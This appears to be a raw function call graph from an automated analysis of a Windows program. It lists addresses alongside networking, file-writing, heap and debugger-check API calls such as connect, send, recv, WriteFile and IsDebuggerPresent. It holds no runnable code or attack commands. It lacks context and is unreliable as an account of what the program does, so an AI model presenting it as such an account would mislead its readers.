1df8b7 select 118229->118234 118238 1df924 GetTickCount64 118229->118238 118262 2be5e7 118230->118262 118231->118090 118233 1df703 118233->118090 118235 1df986 118234->118235 118236 1df8f1 WSAGetLastError 118234->118236 118235->118230 118237 1df98e 118235->118237 118236->118229 118237->118225 118239 1df994 118237->118239 118238->118240 118241 1df9c9 118239->118241 118242 1df9a5 __WSAFDIsSet __WSAFDIsSet 118239->118242 118240->118225 118240->118229 118243 1df9d1 __WSAFDIsSet 118241->118243 118244 1df9ef 118241->118244 118242->118241 118245 1df9dd 118243->118245 118246 1df9e0 __WSAFDIsSet 118243->118246 118247 1dfa1b 118244->118247 118248 1df9fa __WSAFDIsSet 118244->118248 118245->118246 118246->118244 118251 2be5e7 6 API calls 118247->118251 118249 1dfa0c __WSAFDIsSet 118248->118249 118250 1dfa09 118248->118250 118249->118247 118250->118249 118252 1dfa31 118251->118252 118252->118090 118253->118097 118254->118100 118255->118102 118256->118109 118257->118116 118258->118128 118259->118129 118260->118123 118261->118126 118263 2be5ef 118262->118263 118264 2be5f1 IsProcessorFeaturePresent 118262->118264 118263->118233 118266 2bfe73 118264->118266 118269 2bfe22 IsDebuggerPresent GetCurrentProcess TerminateProcess SetUnhandledExceptionFilter UnhandledExceptionFilter 118266->118269 118268 2bff56 118268->118233 118269->118268 118270->118133 118271->118135 118272->118151 118273->118150 118274->118142 118275->118158 118289 1cec90 118276->118289 118278 1cf8f7 118278->118144 118279->118159 118280->118163 118281->118168 118282->118166 118283->118169 118284->118171 118285->118173 118286->118175 118287->118177 118288->118137 118300 1ce620 118289->118300 118291 1ceed7 118292 2be5e7 6 API calls 118291->118292 118293 1ceeea 118292->118293 118293->118278 118295 1cece7 118295->118291 118295->118295 118296 1cf637 118295->118296 118299 2c0ebe 80 API calls 118295->118299 118305 1ce510 118295->118305 118297 2be5e7 6 API calls 118296->118297 118298 1cf64b 118297->118298 118298->118278 118299->118295 118301 1cea3c 118300->118301 118302 1ce646 118300->118302 118301->118295 118302->118301 118303 2beea1 61 API calls 118302->118303 118304 1ce510 61 API calls 118302->118304 118303->118302 118304->118302 118310 2bf24f 61 API calls 118305->118310 118307 1ce54f 118307->118295 118309 1ce522 118309->118307 118311 2bf24f 61 API calls 118309->118311 118310->118309 118311->118309 118314 2bfc89 118312->118314 118313 2bfcb7 118313->118190 118314->118313 118315 2bfcbf 118314->118315 118316 2bfca7 118314->118316 118325 2bfa4e 118315->118325 118343 2be62a 58 API calls 118316->118343 118320 2bfcac 118344 2c5b0e 9 API calls 118320->118344 118326 2bfa5e 118325->118326 118327 2bfa80 EnterCriticalSection 118325->118327 118326->118327 118328 2bfa66 118326->118328 118330 2bfa76 118327->118330 118346 2c8f5f 118328->118346 118331 2bfb24 118330->118331 118332 2bfb51 118331->118332 118335 2bfb33 118331->118335 118345 2bfcf7 LeaveCriticalSection LeaveCriticalSection 118332->118345 118333 2bfb41 118490 2be62a 58 API calls 118333->118490 118335->118332 118335->118333 118342 2bfb6b 118335->118342 118336 2bfb46 118491 2c5b0e 9 API calls 118336->118491 118342->118332 118428 2c1005 118342->118428 118434 2c49ac 118342->118434 118441 2c99a4 118342->118441 118469 2c9205 118342->118469 118343->118320 118344->118313 118345->118313 118347 2c8f70 118346->118347 118348 2c8f83 EnterCriticalSection 118346->118348 118353 2c8fe7 118347->118353 118348->118330 118350 2c8f76 118350->118348 118377 2c4142 58 API calls 118350->118377 118354 2c8ff3 118353->118354 118355 2c8ffc 118354->118355 118356 2c9014 118354->118356 118378 2cb517 58 API calls 118355->118378 118364 2c9035 118356->118364 118383 2c9126 118356->118383 118358 2c9001 118379 2cb574 58 API calls 118358->118379 118362 2c903f 118367 2c8f5f 58 API calls 118362->118367 118363 2c9030 118389 2be62a 58 API calls 118363->118389 118364->118350 118365 2c9008 118380 2c412c 118365->118380 118369 2c9046 118367->118369 118371 2c906b 118369->118371 118372 2c9053 118369->118372 118391 2be832 118371->118391 118390 2cb7b7 InitializeCriticalSectionAndSpinCount 118372->118390 118375 2c905f 118397 2c9087 LeaveCriticalSection 118375->118397 118378->118358 118379->118365 118398 2c40f8 GetModuleHandleExW 118380->118398 118386 2c9134 118383->118386 118385 2c9029 118385->118362 118385->118363 118386->118385 118387 2c9147 118386->118387 118402 2bfd90 118386->118402 118387->118385 118387->118386 118419 2cbabe Sleep 118387->118419 118389->118364 118390->118375 118392 2be83b RtlFreeHeap 118391->118392 118396 2be864 118391->118396 118393 2be850 118392->118393 118392->118396 118427 2be62a 58 API calls 118393->118427 118395 2be856 GetLastError 118395->118396 118396->118375 118397->118364 118399 2c4128 ExitProcess 118398->118399 118400 2c4111 GetProcAddress 118398->118400 118400->118399 118401 2c4123 118400->118401 118401->118399 118403 2bfe0b 118402->118403 118410 2bfd9c 118402->118410 118425 2c8d25 DecodePointer 118403->118425 118405 2bfe11 118426 2be62a 58 API calls 118405->118426 118408 2bfdcf RtlAllocateHeap 118408->118410 118418 2bfe03 118408->118418 118410->118408 118411 2bfdf7 118410->118411 118415 2bfdf5 118410->118415 118416 2bfda7 118410->118416 118422 2c8d25 DecodePointer 118410->118422 118423 2be62a 58 API calls 118411->118423 118414 2c412c 3 API calls 118414->118416 118424 2be62a 58 API calls 118415->118424 118416->118410 118416->118414 118420 2cb517 58 API calls 118416->118420 118421 2cb574 58 API calls 118416->118421 118418->118386 118419->118387 118420->118416 118421->118416 118422->118410 118423->118415 118424->118418 118425->118405 118426->118418 118427->118395 118429 2c1018 118428->118429 118433 2c103c 118428->118433 118430 2c49ac 58 API calls 118429->118430 118429->118433 118431 2c1035 118430->118431 118432 2c99a4 78 API calls 118431->118432 118432->118433 118433->118342 118435 2c49cb 118434->118435 118436 2c49b6 118434->118436 118435->118342 118492 2be62a 58 API calls 118436->118492 118438 2c49bb 118493 2c5b0e 9 API calls 118438->118493 118440 2c49c6 118440->118342 118442 2c99b0 118441->118442 118443 2c99bd 118442->118443 118444 2c99d4 118442->118444 118567 2be5f6 58 API calls 118443->118567 118445 2c9a73 118444->118445 118447 2c99e8 118444->118447 118573 2be5f6 58 API calls 118445->118573 118450 2c9a06 118447->118450 118451 2c9a10 118447->118451 118449 2c99c2 118568 2be62a 58 API calls 118449->118568 118569 2be5f6 58 API calls 118450->118569 118494 2c0936 118451->118494 118452 2c9a0b 118574 2be62a 58 API calls 118452->118574 118456 2c9a16 118458 2c9a3c 118456->118458 118459 2c9a29 118456->118459 118570 2be62a 58 API calls 118458->118570 118503 2c9a93 118459->118503 118460 2c9a7f 118575 2c5b0e 9 API calls 118460->118575 118464 2c9a35 118572 2c9a6b LeaveCriticalSection 118464->118572 118465 2c9a41 118571 2be5f6 58 API calls 118465->118571 118466 2c99c9 118466->118342 118470 2c49ac 58 API calls 118469->118470 118471 2c9213 118470->118471 118472 2c921e 118471->118472 118473 2c9235 118471->118473 118665 2be62a 58 API calls 118472->118665 118474 2c923a 118473->118474 118483 2c9247 118473->118483 118666 2be62a 58 API calls 118474->118666 118477 2c9223 118477->118342 118478 2c92ab 118481 2c92c5 118478->118481 118485 2c92dc 118478->118485 118479 2c9325 118480 2c99a4 78 API calls 118479->118480 118480->118477 118482 2c99a4 78 API calls 118481->118482 118482->118477 118483->118477 118484 2d73d2 58 API calls 118483->118484 118486 2c9296 118483->118486 118489 2c92a1 118483->118489 118484->118486 118485->118477 118667 2c07c7 62 API calls 118485->118667 118486->118489 118662 2d72c4 118486->118662 118489->118478 118489->118479 118490->118336 118491->118332 118492->118438 118493->118440 118495 2c0942 118494->118495 118496 2c0991 EnterCriticalSection 118495->118496 118497 2c8f5f 58 API calls 118495->118497 118498 2c09b7 118496->118498 118499 2c0967 118497->118499 118498->118456 118502 2c097f 118499->118502 118576 2cb7b7 InitializeCriticalSectionAndSpinCount 118499->118576 118577 2c09bb LeaveCriticalSection 118502->118577 118504 2c9aa0 118503->118504 118505 2c9afe 118504->118505 118506 2c9adf 118504->118506 118531 2c9ad4 118504->118531 118509 2c9b56 118505->118509 118510 2c9b3a 118505->118510 118592 2be5f6 58 API calls 118506->118592 118507 2be5e7 6 API calls 118511 2ca2f4 118507->118511 118514 2c9b6f 118509->118514 118598 2c08c3 60 API calls 118509->118598 118595 2be5f6 58 API calls 118510->118595 118511->118464 118512 2c9ae4 118593 2be62a 58 API calls 118512->118593 118578 2d73d2 118514->118578 118517 2c9b3f 118596 2be62a 58 API calls 118517->118596 118519 2c9aeb 118594 2c5b0e 9 API calls 118519->118594 118520 2c9b7d 118523 2c9ed6 118520->118523 118587 2c5cba 118520->118587 118525 2ca269 WriteFile 118523->118525 118526 2c9ef4 118523->118526 118524 2c9b46 118597 2c5b0e 9 API calls 118524->118597 118529 2c9ec9 GetLastError 118525->118529 118536 2c9e96 118525->118536 118530 2ca018 118526->118530 118539 2c9f0a 118526->118539 118529->118536 118542 2ca10d 118530->118542 118544 2ca023 118530->118544 118531->118507 118533 2ca2a2 118533->118531 118603 2be62a 58 API calls 118533->118603 118534 2c9be8 118534->118523 118537 2c9bf8 GetConsoleCP 118534->118537 118536->118531 118536->118533 118541 2c9ff6 118536->118541 118537->118533 118565 2c9c27 118537->118565 118538 2c9f79 WriteFile 118538->118529 118543 2c9fb6 118538->118543 118539->118533 118539->118538 118540 2ca2d0 118604 2be5f6 58 API calls 118540->118604 118546 2ca299 118541->118546 118547 2ca001 118541->118547 118542->118533 118548 2ca182 WideCharToMultiByte 118542->118548 118543->118539 118549 2c9fda 118543->118549 118544->118533 118550 2ca088 WriteFile 118544->118550 118602 2be609 58 API calls 118546->118602 118600 2be62a 58 API calls 118547->118600 118548->118529 118559 2ca1c9 118548->118559 118549->118536 118550->118529 118551 2ca0d7 118550->118551 118551->118536 118551->118544 118551->118549 118554 2ca006 118601 2be5f6 58 API calls 118554->118601 118555 2ca1d1 WriteFile 118556 2ca224 GetLastError 118555->118556 118555->118559 118556->118559 118559->118536 118559->118542 118559->118549 118559->118555 118565->118536 118567->118449 118568->118466 118569->118452 118570->118465 118571->118464 118572->118466 118573->118452 118574->118460 118575->118466 118576->118502 118577->118496 118579 2d73dd 118578->118579 118580 2d73ea 118578->118580 118605 2be62a 58 API calls 118579->118605 118583 2d73f6 118580->118583 118606 2be62a 58 API calls 118580->118606 118582 2d73e2 118582->118520 118583->118520 118585 2d7417 118607 2c5b0e 9 API calls 118585->118607 118608 2c5cd2 GetLastError 118587->118608 118589 2c5cc0 118590 2c5ccd GetConsoleMode 118589->118590 118622 2c4142 58 API calls 118589->118622 118590->118523 118590->118534 118592->118512 118593->118519 118594->118531 118595->118517 118596->118524 118597->118531 118598->118514 118600->118554 118601->118531 118602->118531 118603->118540 118604->118531 118605->118582 118606->118585 118607->118582 118623 2cb776 118608->118623 118610 2c5ce7 118611 2c5d35 SetLastError 118610->118611 118626 2c90de 118610->118626 118611->118589 118615 2c5d0e 118616 2c5d2c 118615->118616 118617 2c5d14 118615->118617 118624 2cb78d TlsGetValue 118623->118624 118625 2cb789 118623->118625 118624->118610 118625->118610 118628 2c90e5 118626->118628 118629 2c5cfa 118628->118629 118631 2c9103 118628->118631 118643 2c6abc 118628->118643 118629->118611 118632 2cb795 TlsSetValue 118629->118632 118631->118628 118631->118629 118651 2cbabe Sleep 118631->118651 118632->118615 118644 2c6ac7 118643->118644 118649 2c6ae2 118643->118649 118645 2c6ad3 118644->118645 118644->118649 118652 2be62a 58 API calls 118645->118652 118647 2c6af2 RtlAllocateHeap 118648 2c6ad8 118647->118648 118647->118649 118648->118628 118649->118647 118649->118648 118653 2c8d25 DecodePointer 118649->118653 118651->118631 118652->118648 118653->118649 118663 2c9126 58 API calls 118662->118663 118664 2d72d9 118663->118664 118664->118489 118665->118477 118666->118477 118667->118477 118669 1e6210 89 API calls 118668->118669 118671 1e5f52 118669->118671 118670 1e5f77 118670->118205 118671->118670 118672 1cf8e0 83 API calls 118671->118672 118672->118670 118673->118202 118674->118211 118675->118210 118676 1dfaf8 118677 1dfb00 118676->118677 118678 1dfc1f 118677->118678 118679 1dfbfe 118677->118679 118680 1dfc7a select 118678->118680 118681 1dfc17 118678->118681 118687 1dfcf5 GetTickCount64 118678->118687 118679->118681 118682 1dfc0c WSASetLastError 118679->118682 118683 1dfde6 Sleep 118679->118683 118684 1dfcb4 WSAGetLastError 118680->118684 118692 1dfd65 118680->118692 118685 2be5e7 6 API calls 118681->118685 118682->118681 118683->118681 118684->118678 118686 1dfe01 118685->118686 118688 1dfd0b 118687->118688 118688->118678 118688->118681 118689 1dfd93 __WSAFDIsSet 118690 1dfda7 __WSAFDIsSet 118689->118690 118689->118692 118691 1dfdbc __WSAFDIsSet 118690->118691 118690->118692 118691->118692 118692->118681 118692->118689 118692->118690 118692->118691 118693 1d4f95 118708 1dd9c0 118693->118708 118695 1d4fa4 118699 1d4bb0 118695->118699 118755 1d9f40 112 API calls 118695->118755 118697 1e6210 89 API calls 118697->118699 118698 1d3850 83 API calls 118698->118699 118699->118697 118699->118698 118700 1d58b9 118699->118700 118702 1d58ac 118699->118702 118707 1d4c4a 118699->118707 118756 1d67d0 GetTickCount64 118699->118756 118757 1d9330 113 API calls 118699->118757 118758 1d3960 83 API calls 118700->118758 118706 1d3960 83 API calls 118706->118707 118707->118699 118707->118706 118754 1dcfe0 GetTickCount64 118707->118754 118709 1dda18 GetTickCount64 118708->118709 118710 1dda01 118708->118710 118713 1dda2e 118709->118713 118711 2be5e7 6 API calls 118710->118711 118712 1dda14 118711->118712 118712->118695 118714 1dde17 118713->118714 118747 1ddad4 118713->118747 118810 1d3960 83 API calls 118714->118810 118716 1dde25 118718 2be5e7 6 API calls 118716->118718 118717 1df690 18 API calls 118717->118747 118720 1dde3b 118718->118720 118719 1ddcb6 118719->118716 118721 1ddcbe 118719->118721 118720->118695 118722 1ddce0 118721->118722 118805 1dd5a0 159 API calls 118721->118805 118808 1d23b0 87 API calls 118722->118808 118724 1ddc03 WSASetLastError 118724->118747 118725 1ddcd1 118725->118710 118725->118722 118726 1dd530 SleepEx getsockopt WSAGetLastError 118726->118747 118728 1ddcf8 118730 1ddd34 118728->118730 118806 1de530 closesocket 118728->118806 118729 1ddde8 118809 1d3960 83 API calls 118729->118809 118759 1d9e60 165 API calls 118730->118759 118735 1ddd4c 118735->118716 118739 1ddd54 118735->118739 118736 1dddfe 118740 2be5e7 6 API calls 118736->118740 118741 1ddd67 GetTickCount64 118739->118741 118742 1dddb0 118739->118742 118743 1dde13 118740->118743 118750 1ddd7c 118741->118750 118760 1dd7c0 118742->118760 118743->118695 118744 1d3850 83 API calls 118744->118747 118746 1dddbe 118807 1d9ef0 83 API calls 118746->118807 118747->118717 118747->118719 118747->118724 118747->118726 118747->118728 118747->118744 118748 1dd5a0 159 API calls 118747->118748 118802 2082e0 85 API calls 118747->118802 118803 208240 84 API calls 118747->118803 118804 1d23b0 87 API calls 118747->118804 118748->118747 118750->118742 118751 1dddc5 118752 2be5e7 6 API calls 118751->118752 118753 1dddd5 118752->118753 118753->118695 118754->118707 118755->118699 118756->118699 118757->118699 118758->118702 118759->118735 118761 1dd7ea 118760->118761 118762 1dd99c 118760->118762 118761->118762 118764 1dd7f7 getpeername 118761->118764 118763 2be5e7 6 API calls 118762->118763 118765 1dd9b4 118763->118765 118766 1dd817 WSAGetLastError 118764->118766 118767 1dd850 118764->118767 118765->118746 118811 1d23b0 87 API calls 118766->118811 118769 1dd869 getsockname 118767->118769 118771 1dd8ba 118769->118771 118772 1dd881 WSAGetLastError 118769->118772 118770 1dd828 118812 1d3960 83 API calls 118770->118812 118815 1dd760 86 API calls 118771->118815 118813 1d23b0 87 API calls 118772->118813 118776 1dd835 118779 2be5e7 6 API calls 118776->118779 118777 1dd892 118814 1d3960 83 API calls 118777->118814 118778 1dd8d5 118781 1dd8dc GetLastError 118778->118781 118782 1dd915 118778->118782 118783 1dd849 118779->118783 118816 1d23b0 87 API calls 118781->118816 118818 1dd760 86 API calls 118782->118818 118783->118746 118785 1dd89f 118788 2be5e7 6 API calls 118785->118788 118787 1dd95c 118787->118762 118791 1dd963 GetLastError 118787->118791 118792 1dd8b3 118788->118792 118789 1dd8ed 118817 1d3960 83 API calls 118789->118817 118819 1d23b0 87 API calls 118791->118819 118792->118746 118793 1dd8fa 118795 2be5e7 6 API calls 118793->118795 118797 1dd90e 118795->118797 118796 1dd974 118820 1d3960 83 API calls 118796->118820 118797->118746 118799 1dd981 118800 2be5e7 6 API calls 118799->118800 118801 1dd995 118800->118801 118801->118746 118802->118747 118803->118747 118804->118747 118805->118725 118806->118730 118807->118751 118808->118729 118809->118736 118810->118716 118811->118770 118812->118776 118813->118777 118814->118785 118815->118778 118816->118789 118817->118793 118818->118787 118819->118796 118820->118799 118821 1cbcb0 118822 1cbcd8 118821->118822 118823 1cbe07 118821->118823 118825 1cbdfc 118822->118825 118827 1cbcf5 118822->118827 118840 1cbd74 118822->118840 118824 2bfc7d 80 API calls 118831 1cbdaf 118824->118831 118876 1c1a10 83 API calls 118825->118876 118828 1cbd39 118827->118828 118829 2c0dc6 125 API calls 118827->118829 118853 2c0dc6 118828->118853 118833 1cbd06 118829->118833 118830 1cbdd8 118836 1cbde9 118830->118836 118875 2c1072 84 API calls 118830->118875 118831->118830 118874 1d11e0 84 API calls 118831->118874 118833->118828 118837 1cbd0d 118833->118837 118856 2c0e47 118837->118856 118839 1cbd4c 118871 2be62a 58 API calls 118839->118871 118840->118824 118843 1cbd13 118869 2c19b6 58 API calls 118843->118869 118844 1cbd51 118872 2c19b6 58 API calls 118844->118872 118847 1cbd58 118873 1c1a10 83 API calls 118847->118873 118848 1cbd1d 118870 1c1a10 83 API calls 118848->118870 118851 1cbd69 118852 1cbd2e 118877 2c0d02 118853->118877 118855 1cbd45 118855->118839 118855->118840 118857 2c0e53 118856->118857 118858 2c0e7f 118857->118858 118859 2c0e67 118857->118859 118862 2bfa4e 59 API calls 118858->118862 118864 2c0e77 118858->118864 119189 2be62a 58 API calls 118859->119189 118861 2c0e6c 119190 2c5b0e 9 API calls 118861->119190 118865 2c0e91 118862->118865 118864->118843 119173 2c0ddb 118865->119173 118869->118848 118870->118852 118871->118844 118872->118847 118873->118851 118874->118830 118875->118836 118876->118823 118879 2c0d0e 118877->118879 118878 2c0d20 118928 2be62a 58 API calls 118878->118928 118879->118878 118881 2c0d4d 118879->118881 118896 2cbaf7 118881->118896 118882 2c0d25 118929 2c5b0e 9 API calls 118882->118929 118885 2c0d52 118886 2c0d68 118885->118886 118887 2c0d5b 118885->118887 118889 2c0d91 118886->118889 118890 2c0d71 118886->118890 118930 2be62a 58 API calls 118887->118930 118911 2cbc16 118889->118911 118931 2be62a 58 API calls 118890->118931 118892 2c0d30 118892->118855 118897 2cbb03 118896->118897 118898 2c8f5f 58 API calls 118897->118898 118904 2cbb11 118898->118904 118899 2cbb8c 118901 2c9126 58 API calls 118899->118901 118903 2cbb93 118901->118903 118902 2cbc02 118902->118885 118909 2cbb85 118903->118909 118938 2cb7b7 InitializeCriticalSectionAndSpinCount 118903->118938 118904->118899 118906 2c8fe7 58 API calls 118904->118906 118904->118909 118936 2bfa8d 59 API calls 118904->118936 118937 2bfaf7 LeaveCriticalSection LeaveCriticalSection 118904->118937 118906->118904 118908 2cbbb9 EnterCriticalSection 118908->118909 118933 2cbc0d 118909->118933 118920 2cbc33 118911->118920 118912 2cbc47 118943 2be62a 58 API calls 118912->118943 118913 2cbdee 118913->118912 118916 2cbe4a 118913->118916 118915 2cbc4c 118944 2c5b0e 9 API calls 118915->118944 118940 2c391d 118916->118940 118919 2c0d9c 118932 2c0dbe LeaveCriticalSection LeaveCriticalSection 118919->118932 118920->118912 118920->118913 118945 2d76bf 58 API calls 118920->118945 118922 2cbdb4 118922->118912 118922->118922 118946 2d77ee 65 API calls 118922->118946 118924 2cbde7 118924->118913 118947 2d77ee 65 API calls 118924->118947 118926 2cbe06 118926->118913 118948 2d77ee 65 API calls 118926->118948 118928->118882 118929->118892 118930->118892 118931->118892 118932->118892 118939 2c90c9 LeaveCriticalSection 118933->118939 118935 2cbc14 118935->118902 118936->118904 118937->118904 118938->118908 118939->118935 118949 2c3806 118940->118949 118942 2c3936 118942->118919 118943->118915 118944->118919 118945->118922 118946->118924 118947->118926 118948->118913 118950 2c3812 118949->118950 118951 2c3828 118950->118951 118953 2c385e 118950->118953 118967 2be62a 58 API calls 118951->118967 118960 2c38cf 118953->118960 118954 2c382d 118968 2c5b0e 9 API calls 118954->118968 118959 2c3837 118959->118942 118970 2c4046 118960->118970 118963 2c387a 118969 2c38a3 LeaveCriticalSection 118963->118969 118966 2be832 58 API calls 118966->118963 118967->118954 118968->118959 118969->118959 118971 2c4069 118970->118971 118972 2c4053 118970->118972 118971->118972 118974 2c4070 118971->118974 119063 2be62a 58 API calls 118972->119063 118977 2c4079 AreFileApisANSI 118974->118977 118978 2c4086 MultiByteToWideChar 118974->118978 118975 2c4058 119064 2c5b0e 9 API calls 118975->119064 118977->118978 118979 2c4083 118977->118979 118980 2c40a0 GetLastError 118978->118980 118981 2c40b1 118978->118981 118979->118978 119065 2be609 58 API calls 118980->119065 118983 2c9126 58 API calls 118981->118983 118984 2c40b9 118983->118984 118985 2c40c0 MultiByteToWideChar 118984->118985 118986 2c38e3 118984->118986 118985->118986 118987 2c40d6 GetLastError 118985->118987 118986->118963 118991 2cf4c1 118986->118991 119066 2be609 58 API calls 118987->119066 118989 2c40e2 118990 2be832 58 API calls 118989->118990 118990->118986 118992 2cf4e1 118991->118992 119067 2c49d0 118992->119067 118996 2cf4fd 118997 2cf537 118996->118997 119002 2cf55a 118996->119002 119062 2cf634 118996->119062 119098 2be5f6 58 API calls 118997->119098 118999 2cf53c 119099 2be62a 58 API calls 118999->119099 119001 2cf549 119100 2c5b0e 9 API calls 119001->119100 119003 2cf618 119002->119003 119010 2cf5f6 119002->119010 119101 2be5f6 58 API calls 119003->119101 119006 2c3909 119006->118966 119007 2cf61d 119102 2be62a 58 API calls 119007->119102 119009 2cf62a 119103 2c5b0e 9 API calls 119009->119103 119074 2c09c4 119010->119074 119013 2cf6c4 119014 2cf6ce 119013->119014 119015 2cf6f1 119013->119015 119104 2be5f6 58 API calls 119014->119104 119092 2cf370 119015->119092 119018 2cf6d3 119105 2be62a 58 API calls 119018->119105 119133 2c5b1e IsProcessorFeaturePresent 119062->119133 119063->118975 119064->118986 119065->118986 119066->118989 119068 2c49ef 119067->119068 119069 2c49da 119067->119069 119068->118996 119139 2be62a 58 API calls 119069->119139 119071 2c49df 119140 2c5b0e 9 API calls 119071->119140 119073 2c49ea 119073->118996 119075 2c09d0 119074->119075 119076 2c8fe7 58 API calls 119075->119076 119077 2c09e1 119076->119077 119078 2c8f5f 58 API calls 119077->119078 119079 2c09e6 119077->119079 119088 2c09f4 119078->119088 119079->119013 119080 2c0b42 119143 2c0b64 LeaveCriticalSection 119080->119143 119082 2c0ad4 119083 2c90de 58 API calls 119082->119083 119086 2c0add 119083->119086 119084 2c8f5f 58 API calls 119084->119088 119085 2c0a74 EnterCriticalSection 119087 2c0a84 LeaveCriticalSection 119085->119087 119085->119088 119086->119080 119089 2c0936 59 API calls 119086->119089 119087->119088 119088->119080 119088->119082 119088->119084 119088->119085 119141 2cb7b7 InitializeCriticalSectionAndSpinCount 119088->119141 119142 2c0a9c LeaveCriticalSection 119088->119142 119089->119080 119093 2cf37b 119092->119093 119094 2cf37f GetModuleHandleW GetProcAddress 119093->119094 119095 2cf3d6 CreateFileW 119093->119095 119098->118999 119099->119001 119100->119006 119101->119007 119102->119009 119103->119062 119104->119018 119134 2c5b29 119133->119134 119164 2c59b1 119134->119164 119138 2c5b44 119139->119071 119140->119073 119141->119088 119142->119088 119143->119079 119165 2c59cb 119164->119165 119166 2c59eb IsDebuggerPresent 119165->119166 119172 2cbae1 SetUnhandledExceptionFilter UnhandledExceptionFilter 119166->119172 119168 2be5e7 6 API calls 119169 2c5ad2 119168->119169 119171 2cbacc GetCurrentProcess TerminateProcess 119169->119171 119170 2c5aaf 119170->119168 119171->119138 119172->119170 119174 2c0dfe 119173->119174 119175 2c0dea 119173->119175 119176 2c0dfa 119174->119176 119178 2c1005 78 API calls 119174->119178 119222 2be62a 58 API calls 119175->119222 119191 2c0eb6 LeaveCriticalSection LeaveCriticalSection 119176->119191 119180 2c0e0a 119178->119180 119179 2c0def 119223 2c5b0e 9 API calls 119179->119223 119192 2cc157 119180->119192 119184 2c49ac 58 API calls 119185 2c0e18 119184->119185 119196 2cbfe2 119185->119196 119187 2c0e1e 119187->119176 119188 2be832 58 API calls 119187->119188 119188->119176 119189->118861 119190->118864 119191->118864 119193 2c0e12 119192->119193 119194 2cc164 119192->119194 119193->119184 119194->119193 119195 2be832 58 API calls 119194->119195 119195->119193 119197 2cbfee 119196->119197 119198 2cbffb 119197->119198 119199 2cc012 119197->119199 119224 2be5f6 58 API calls 119198->119224 119201 2cc09d 119199->119201 119203 2cc022 119199->119203 119229 2be5f6 58 API calls 119201->119229 119202 2cc000 119225 2be62a 58 API calls 119202->119225 119207 2cc04a 119203->119207 119208 2cc040 119203->119208 119206 2cc045 119230 2be62a 58 API calls 119206->119230 119210 2c0936 59 API calls 119207->119210 119226 2be5f6 58 API calls 119208->119226 119212 2cc050 119210->119212 119214 2cc06e 119212->119214 119215 2cc063 119212->119215 119213 2cc0a9 119231 2c5b0e 9 API calls 119213->119231 119227 2be62a 58 API calls 119214->119227 119219 2cc0bd 61 API calls 119215->119219 119216 2cc007 119216->119187 119220 2cc069 119219->119220 119228 2cc095 LeaveCriticalSection 119220->119228 119222->119179 119223->119176 119224->119202 119225->119216 119226->119206 119227->119220 119228->119216 119229->119206 119230->119213 119231->119216 119232 1d3cb0 send 119233 1d3ce4 WSAGetLastError 119232->119233 119239 1d3d18 119232->119239 119234 1d3cf4 119233->119234 119235 1d3d01 119233->119235 119240 1d23b0 87 API calls 119235->119240 119237 1d3d0a 119241 1d3960 83 API calls 119237->119241 119240->119237 119241->119239 119242 1d3d70 recv 119243 1d3dd8 119242->119243 119244 1d3da4 WSAGetLastError 119242->119244 119245 1d3db4 119244->119245 119246 1d3dc1 119244->119246 119250 1d23b0 87 API calls 119246->119250 119248 1d3dca 119251 1d3960 83 API calls 119248->119251 119250->119248 119251->119243 119252 1ddfb0 119300 1de580 119252->119300 119255 1de030 119332 208240 84 API calls 119255->119332 119256 1de013 119257 1de272 GetLastError 119256->119257 119331 2082e0 85 API calls 119256->119331 119340 1d23b0 87 API calls 119257->119340 119259 2be5e7 6 API calls 119263 1de2be 119259->119263 119262 1de02e 119262->119257 119265 1de04d htons 119262->119265 119264 1de28b 119341 1d3960 83 API calls 119264->119341 119267 1d3850 83 API calls 119265->119267 119270 1de06a 119267->119270 119268 1de29c 119342 1de530 closesocket 119268->119342 119271 1de0ae 119270->119271 119333 1dde40 89 API calls 119270->119333 119306 1ddea0 119271->119306 119274 1de0b5 119275 1de0ce 119274->119275 119319 1dcf00 setsockopt 119274->119319 119276 1de0ef 119275->119276 119284 1de135 119275->119284 119277 1de102 119276->119277 119279 1de148 ioctlsocket GetTickCount64 119276->119279 119334 1dd110 138 API calls 119277->119334 119282 1de177 119279->119282 119281 1de10d 119281->119279 119283 1de116 119281->119283 119287 1de19e 119282->119287 119288 1de1ab 119282->119288 119335 1de530 closesocket 119283->119335 119336 1de530 closesocket 119284->119336 119337 1d6710 GetTickCount64 119287->119337 119289 1de13e 119288->119289 119292 1de1c3 connect 119288->119292 119289->119259 119290 1de11f 119290->119289 119293 1de1dc WSAGetLastError 119292->119293 119294 1de1e8 119292->119294 119293->119294 119294->119289 119338 1d23b0 87 API calls 119294->119338 119296 1de21d 119297 1d3850 83 API calls 119296->119297 119298 1de231 119297->119298 119339 1de530 closesocket 119298->119339 119301 1de5cf 119300->119301 119302 1de60f socket 119301->119302 119303 1de5ff 119301->119303 119302->119303 119304 2be5e7 6 API calls 119303->119304 119305 1ddffc 119304->119305 119305->119255 119305->119256 119305->119289 119307 1ddf3b 119306->119307 119308 1dded7 119306->119308 119309 1ddf8d 119307->119309 119310 1ddf4c getsockopt 119307->119310 119311 1ddee7 VerSetConditionMask VerifyVersionInfoA 119308->119311 119314 2be5e7 6 API calls 119309->119314 119312 1ddf6b 119310->119312 119313 1ddf75 setsockopt 119310->119313 119311->119307 119315 1ddf1b 119311->119315 119312->119309 119312->119313 119313->119309 119316 1ddf9c 119314->119316 119317 2be5e7 6 API calls 119315->119317 119316->119274 119318 1ddf34 119317->119318 119318->119274 119320 1dcf5c WSAIoctl 119319->119320 119321 1dcf3c 119319->119321 119322 1dcfb6 WSAGetLastError 119320->119322 119327 1dcfc9 119320->119327 119323 1d3850 83 API calls 119321->119323 119324 1d3850 83 API calls 119322->119324 119326 1dcf48 119323->119326 119324->119327 119325 2be5e7 6 API calls 119328 1dcfd9 119325->119328 119329 2be5e7 6 API calls 119326->119329 119327->119325 119328->119275 119330 1dcf58 119329->119330 119330->119275 119331->119262 119332->119262 119333->119271 119334->119281 119335->119290 119336->119289 119337->119288 119338->119296 119339->119289 119340->119264 119341->119268 119342->119289 119343 1cb612 119344 1cb620 119343->119344 119372 2c1fd2 119344->119372 119346 1cb63f 119347 1cb657 119346->119347 119433 2c4d21 119346->119433 119351 1cb692 119347->119351 119399 1cd790 119347->119399 119444 1c8660 87 API calls 119351->119444 119352 1cb678 119443 1c1b70 83 API calls 119352->119443 119355 1cb69e 119357 1cb6df 119355->119357 119369 1cb6b0 119355->119369 119356 1cb682 119358 1cb6f9 119357->119358 119359 1cb6e4 119357->119359 119361 1cb6fe 119358->119361 119362 1cb70b 119358->119362 119446 2c238c 80 API calls 119359->119446 119447 1cb7d0 90 API calls 119361->119447 119365 1cb71f 119362->119365 119448 1cb890 92 API calls 119362->119448 119363 1cb6ee 119367 1cb703 119370 